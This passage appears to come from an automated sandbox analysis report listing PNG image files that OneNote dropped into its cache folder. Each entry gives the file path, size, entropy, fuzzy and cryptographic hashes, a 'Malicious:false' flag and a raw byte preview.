                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17289
                                                                                                                                                    Entropy (8bit):7.962998633267186
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                    MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                    SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                    SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                    SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2332
                                                                                                                                                    Entropy (8bit):7.8822150338370776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                    MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                    SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                    SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                    SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13737
                                                                                                                                                    Entropy (8bit):7.916899917415529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                    MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                    SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                    SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                    SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1924
                                                                                                                                                    Entropy (8bit):7.836744258175623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                    MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                    SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                    SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                    SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                    Malicious:false
